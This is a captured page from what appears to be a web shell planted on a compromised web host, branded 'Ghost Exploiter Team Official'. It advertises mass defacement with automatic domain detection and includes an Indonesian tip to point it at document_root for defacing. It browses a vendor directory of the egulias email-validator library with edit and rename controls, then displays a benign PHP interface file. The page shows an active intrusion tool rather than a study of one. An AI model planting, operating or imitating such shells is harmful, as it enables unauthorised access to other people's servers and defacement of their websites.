webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
egulias
/
email-validator
/
src
/
Validation
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Exception
--
ren
Extra
--
ren
DNSCheckValidation.php
5.652KB
edt
ren
DNSGetRecordWrapper.php
0.888KB
edt
ren
DNSRecords.php
0.45KB
edt
ren
EmailValidation.php
0.768KB
edt
ren
MessageIDValidation.php
1.271KB
edt
ren
MultipleValidationWithA
...
2.757KB
edt
ren
NoRFCWarningsValidation
...
0.825KB
edt
ren
RFCValidation.php
1.262KB
edt
ren
<?php namespace Egulias\EmailValidator\Validation; use Egulias\EmailValidator\EmailLexer; use Egulias\EmailValidator\Result\InvalidEmail; use Egulias\EmailValidator\Warning\Warning; interface EmailValidation { /** * Returns true if the given email is valid. * * @param string $email The email you want to validate. * @param EmailLexer $emailLexer The email lexer. * * @return bool */ public function isValid(string $email, EmailLexer $emailLexer) : bool; /** * Returns the validation error. * * @return InvalidEmail|null */ public function getError() : ?InvalidEmail; /** * Returns the validation warnings. * * @return Warning[] */ public function getWarnings() : array; }
<=Back
Liking